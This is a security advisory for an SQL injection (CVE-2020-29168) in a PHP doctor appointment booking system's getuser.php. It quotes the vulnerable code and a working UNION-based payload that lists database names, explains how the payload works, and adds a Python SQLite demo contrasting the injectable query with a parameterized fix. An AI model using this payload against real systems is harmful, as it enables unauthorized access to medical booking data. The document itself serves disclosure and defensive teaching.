CVE-2020-29168: Online Doctor Appointment Booking System PHP and Mysql 1.0 – ‘q’ SQL Injection

November 29, 2020


I discovered an SQL injection vulnerability in the PHP Doctor Appointment System on 11/16/2020.

In the ‘getuser.php’ file, the GET parameter ‘q’ is vulnerable.

The script concatenates the user-supplied value of ‘q’ directly into an SQL statement without neutralizing special elements (CWE-89), so an attacker can close the intended string literal and append arbitrary SQL that the database executes with the application's privileges.

Vulnerable code (getuser.php):

<?php
include_once 'assets/conn/dbconnect.php'; // provides $con (mysqli connection)
$q = $_GET['q']; // Vulnerable param: taken from the query string without validation or escaping
// echo $q;
// Injection point: $q is interpolated into the string literal, so a quote in $q breaks out of it
$res = mysqli_query($con,"SELECT * FROM doctorschedule WHERE scheduleDate='$q'");

Used Payload (URL-encoded):

http://localhost/[PATH]/getuser.php?q=1%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x7162717671%2CIFNULL%28CAST%28schema_name%20AS%20NCHAR%29%2C0x20%29%2C0x7176627871%29%2CNULL%2CNULL%2CNULL%2CNULL%20FROM%20INFORMATION_SCHEMA.SCHEMATA%23

Decoded, the value of ‘q’ is:

1' UNION ALL SELECT NULL,CONCAT(0x7162717671,IFNULL(CAST(schema_name AS NCHAR),0x20),0x7176627871),NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA#

The leading 1' closes the scheduleDate string literal; the UNION ALL appends rows with six columns, matching the column count of doctorschedule so the union is accepted; the hex literals 0x7162717671 ('qbqvq') and 0x7176627871 ('qvbxq') bracket each schema_name so the value can be picked out of the rendered page; and the trailing # comments out the closing quote of the original query.

Output: Extracted database: qbqvqdb_healthcareqvbxq (i.e. db_healthcare once the marker strings are stripped).
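The following is an added example, not code from the original advisory or from the vulnerable application, that reproduces the mechanics of the payload above against an in-memory SQLite database and shows the parameterized query that closes the hole. The six-column doctorschedule layout, the extra users table and the SQLite-flavoured payload (sqlite_master instead of INFORMATION_SCHEMA.SCHEMATA, CAST(... AS TEXT) instead of NCHAR, and -- instead of MySQL's # comment) are constructed assumptions for the demo; the marker strings are the same hex values used in the real payload.

```python
import re
import sqlite3

# Marker strings from the published payload: 0x7162717671 = 'qbqvq', 0x7176627871 = 'qvbxq'.
PREFIX = bytes.fromhex("7162717671").decode()
SUFFIX = bytes.fromhex("7176627871").decode()


def build_db():
    # Constructed stand-in for the application's schema (assumption): doctorschedule has
    # six columns, which is why the UNION SELECT in the payload supplies exactly six values.
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE doctorschedule (scheduleId INTEGER, doctorId INTEGER, "
        "scheduleDate TEXT, startTime TEXT, endTime TEXT, status TEXT)"
    )
    con.execute(
        "INSERT INTO doctorschedule VALUES (1, 7, '2020-11-16', '09:00', '12:00', 'open')"
    )
    # A second table so that the schema listing pulled out by the UNION is non-trivial.
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    return con


def vulnerable_query(con, q):
    # Mirrors getuser.php: the 'q' value is interpolated straight into the SQL string.
    sql = f"SELECT * FROM doctorschedule WHERE scheduleDate='{q}'"
    return con.execute(sql).fetchall()


def safe_query(con, q):
    # Hardened form: the value is bound as a parameter, so quotes and keywords in q are
    # treated as literal characters of a date string and never reach the SQL parser.
    return con.execute(
        "SELECT * FROM doctorschedule WHERE scheduleDate=?", (q,)
    ).fetchall()


# SQLite equivalent of the MySQL payload (assumption for the demo): sqlite_master replaces
# INFORMATION_SCHEMA.SCHEMATA, CAST(... AS TEXT) replaces CAST(... AS NCHAR), and '-- '
# replaces MySQL's '#' so the closing quote of the original query is commented out.
PAYLOAD = (
    "1' UNION ALL SELECT NULL,"
    f"'{PREFIX}'||IFNULL(CAST(name AS TEXT),' ')||'{SUFFIX}',"
    "NULL,NULL,NULL,NULL FROM sqlite_master WHERE type='table'-- "
)


def extract_marked(rows):
    # Pull every marker-delimited value out of the result set; this is how the
    # 'qbqvq...qvbxq' fragments in the advisory's output are turned back into names.
    pattern = re.compile(re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX))
    found = []
    for row in rows:
        for cell in row:
            if isinstance(cell, str):
                found.extend(pattern.findall(cell))
    return found


def demo():
    # Returns (names leaked via the vulnerable query, rows returned by the safe query).
    con = build_db()
    leaked = extract_marked(vulnerable_query(con, PAYLOAD))
    safe = safe_query(con, PAYLOAD)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("leaked via injection:", leaked)   # table names from sqlite_master
    print("safe query rows:", safe)          # [] - payload treated as a literal date
```

The vulnerable path returns the table names wrapped in the markers; the bound-parameter path returns nothing, because the whole payload is compared against scheduleDate as one string. In the PHP original the same fix is a mysqli prepared statement with bind_param; additionally rejecting anything that is not a YYYY-MM-DD date before it reaches the query is cheap defence in depth.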
